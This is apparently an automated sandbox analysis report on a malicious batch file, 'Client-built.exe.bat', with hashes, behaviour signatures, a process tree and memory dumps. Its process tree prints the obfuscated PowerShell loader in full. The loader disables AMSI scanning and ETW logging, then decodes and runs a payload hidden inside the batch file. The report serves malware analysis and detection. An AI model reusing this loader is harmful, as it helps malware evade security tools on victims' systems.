Overview

overview

10

Static

static

1

Client-built.exe.bat

windows7-x64

6

Client-built.exe.bat

windows10-2004-x64

10

Analysis

  • max time kernel
    121s
  • max time network
    126s
  • platform
    windows7_x64
  • resource
    win7-20241010-en
  • resource tags

    arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
  • submitted
    25-11-2024 23:53

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    Client-built.exe.bat

  • Size

    4.2MB

  • MD5

    e8f9b123f6368338546d660e983af6b0

  • SHA1

    d622ddcfbba5060244816540768925563a7c66c3

  • SHA256

    4a664bab85afe1b3d5013278ba99280506c1eb42bac4e7b23bcc932eda627c8b

  • SHA512

    6ad576a2dd1e73b2eb18c240bd4ac824850e431d800fc2d8c520f6a2b1ea8d50d01c008bcab5cb1cc5189f120fd331870fa25925a2994a8c1e84e265492e9f5c

  • SSDEEP

    49152:eDzoesdQ9TpsKmiB/J73/gnGKmTi5wU50WU:Q

Score
6/10
execution

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

    execution
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c "C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1644
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -exec bypass -C "$kdot_file='C:\Users\Admin\AppData\Local\Temp\Client-built.exe.bat';if (.([char](((-18989 -Band 4925) + (-18989 -Bor 4925) + 5167 + 8981))+[char]((15592 - 5449 - 5372 - 4670))+[char]((7757 - 4149 - 3692 + 199))+[char]((6189 - 5510 - 4827 + 4264))+[char](((-712 -Band 8324) + (-712 -Bor 8324) - 9313 + 1746))+[char](((-4636 -Band 8829) + (-4636 -Bor 8829) - 9840 + 5727))+[char]((21086 - 6295 - 9972 - 4722))+[char]((13029 - 9372 + 5383 - 8924))+[char](((2214 -Band 3002) + (2214 -Bor 3002) + 14 - 5126))) ([SySTEM.Text.eNcODiNg]::UTf8.geTStRiNg([syStem.cOnVERt]::FROmBaSe64STRINg('JEVOVjp1c2VycHJvZmlsZVxE')) + [SySteM.teXt.encOding]::UTF8.geTStriNg((0x6f, 0x77, 0x6e, 0x6c, 0x6f, 0x61, 0x64, 0x73, 0x5c, 0x52, 0x65, 0x73, 0x75, 0x6d, 0x65)) + [syStem.tEXT.encODing]::uTF8.gEtstRing((0x47, 0x72, 0x61, 0x6e, 0x74, 0x2e, 0x73, 0x79, 0x73)))) { exit };${kdOtLCJrxpwvng}=([systEM.tExt.eNcoDinG]::utf8.GeTSTrINg((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46)) + [SySTEm.TeXt.ENCOding]::UTF8.geTsTRIng([SysTem.conVeRt]::fROmbaSe64StRINg('QXV0b21hdGlvbi5BbXNpVXRpbHM=')));${k`DotvllZJgLtgx}=([SystEM.tEXt.ENcODInG]::uTF8.GETstrInG([sYStEm.COnVeRT]::FrOmbaSe64strIng('YW1zaUluaXRGYWlsZWQ=')));${KdOteJyma`PyhoD}=[REF].AssEmblY;${kdOtap`Yr`KnuXkZ}=${kdOt`EJYMapYHOD}.geTtype(${k`Dotl`CjrxpwvnG});$kdoTgnaGLeanqB=${kdoTaPyrkn`UXKz}.geTfIELD(${KdotvL`Lz`JgLtgx},([SysTeM.tExt.EnCODING]::uTF8.geTStrinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63))));$KdOtgNaGLeanQb.sEtvaLUE($nULl,([BOol][chaR]));([REflEcTion.ASsemBlY]::LOaDwIthpARtIALnaME(((([sySTEM.text.eNcOdiNg]::utF8.GETStRing((0x53, 0x79, 0x73, 0x74, 0x65, 0x6d, 0x2e, 0x43, 0x6f, 0x72, 0x65)))))).GeTTYPe(((([SyStEm.TeXT.ENcOdING]::utF8.geTSTRInG((83, 121, 115, 116, 101, 109, 46, 68, 105, 97, 103, 110, 111, 115, 116, 105)) + [syStem.TExT.EncoDing]::utF8.gEtSTRing((99, 115, 46, 69, 118, 101, 110, 116, 105, 110, 103, 46, 69, 118, 101, 110, 116, 80, 114, 111)) + [SysTEm.tEXT.ENCOdinG]::UTF8.GETstring((0x76, 0x69, 0x64, 0x65, 0x72)))))).GETfIeLD(((([sYsTeM.TeXt.ENcOdiNg]::Utf8.GeTstRiNG((109, 95)) + [sySteM.texT.enCODInG]::UTF8.GEtSTring((0x65, 0x6e, 0x61, 0x62)) + [sYsTem.TeXt.eNCOdIng]::UTf8.geTSTRING((108, 101, 100))))),((([system.TeXt.EncOdInG]::utF8.gEtSTRinG((78, 111, 110, 80, 117, 98, 108, 105, 99, 44, 73, 110, 115, 116, 97, 110, 99, 101)))))).SetVaLuE([Ref].ASsEmbly.getType(((([systEm.Text.ENcODIng]::uTF8.GeTStriNG((83, 121, 115, 116, 101, 109, 46, 77, 97, 110, 97, 103, 101, 109, 101, 110, 116, 46, 65, 117, 116, 111, 109, 97, 116, 105, 111, 110, 46, 84, 114, 97, 99, 105)) + [SYSteM.TEXT.ENCodIng]::Utf8.GEtSTrinG((0x6e, 0x67, 0x2e, 0x50, 0x53, 0x45, 0x74, 0x77, 0x4c, 0x6f, 0x67, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72)))))).GetfielD(((([SySTEM.teXT.eNcODiNG]::utf8.gETStRing((0x65, 0x74, 0x77, 0x50, 0x72, 0x6f, 0x76, 0x69, 0x64, 0x65, 0x72))))),((([SysTeM.TEXt.ENCoDInG]::utf8.gEtsTRinG((0x4e, 0x6f, 0x6e, 0x50, 0x75, 0x62, 0x6c, 0x69, 0x63, 0x2c, 0x53, 0x74, 0x61, 0x74, 0x69, 0x63)))))).GetVAluE($nULl),0));.([char]((-257 - 1031 + 9766 - 8373))+[char]((1823 - 9768 + 8223 - 177))+[char](((-19562 -Band 889) + (-19562 -Bor 889) + 9885 + 8908))) ([tEXT.encodIng]::UTF8.gEtSTrING([CoNvErt]::FroMBAse64StriNg((.([char]((11498 - 2401 - 178 - 8848))+[char]((-11105 - 5194 + 7505 + 8895))+[char]((222 - 4618 + 153 + 4359))+[char]((-2637 - 1093 + 9286 - 5511))+[char](((-4650 -Band 9781) + (-4650 -Bor 9781) - 1475 - 3589))+[char]((3131 - 3111 + 154 - 63))+[char]((18786 - 6317 - 8092 - 4267))+[char](((-2844 -Band 5727) + (-2844 -Bor 5727) - 703 - 2064))+[char]((7821 - 9012 - 6084 + 7376))+[char]((4558 - 872 + 4205 - 7781))+[char](((15508 -Band 482) + (15508 -Bor 482) - 7709 - 8165))) $KDot_file -raw | .([char]((11950 - 980 - 4943 - 5944))+[char](((-8135 -Band 6460) + (-8135 -Bor 6460) - 479 + 2255))+[char](((-13228 -Band 3952) + (-13228 -Bor 3952) + 547 + 8837))+[char](((-19627 -Band 1554) + (-19627 -Bor 1554) + 9787 + 8387))+[char](((-21855 -Band 6576) + (-21855 -Bor 6576) + 9605 + 5773))+[char](((10719 -Band 1622) + (10719 -Bor 1622) - 4422 - 7803))+[char](((15556 -Band 721) + (15556 -Bor 721) - 9597 - 6635))+[char](((4849 -Band 877) + (4849 -Bor 877) - 2305 - 3338))+[char](((-13113 -Band 8015) + (-13113 -Bor 8015) + 3741 + 1473))+[char]((-17 - 8310 + 8801 - 360))+[char](((-8482 -Band 1532) + (-8482 -Bor 1532) + 8379 - 1324))+[char]((-1608 - 2948 - 4299 + 8965))+[char](((-7699 -Band 8648) + (-7699 -Bor 8648) + 538 - 1384))) (([SySTem.teXt.eNcOdiNg]::UTf8.GEtsTrinG(58)) + ([SyStem.TExT.ENcodinG]::utf8.gETstRINg([sYstem.cOnVert]::FRoMbaSe64strIng('OktET1Q6OiguKik='))))).MAtcHeS.GrouPS[1].vaLuE)))"
      2⤵
      • Command and Scripting Interpreter: PowerShell
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2352

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • memory/2352-4-0x000007FEF651E000-0x000007FEF651F000-memory.dmp

    Filesize

    4KB

    Download

  • memory/2352-5-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2352-6-0x000000001B120000-0x000000001B402000-memory.dmp

    Filesize

    2.9MB

    Download

  • memory/2352-8-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2352-7-0x0000000002490000-0x0000000002498000-memory.dmp

    Filesize

    32KB

    Download

  • memory/2352-9-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

    Filesize

    9.6MB

    Download

  • memory/2352-10-0x000007FEF6260000-0x000007FEF6BFD000-memory.dmp

    Filesize

    9.6MB

    Download